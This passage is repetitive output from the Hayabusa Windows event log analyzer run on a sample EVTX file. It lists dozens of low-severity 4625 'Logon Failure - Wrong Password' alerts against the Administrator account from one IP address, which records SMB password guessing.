NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
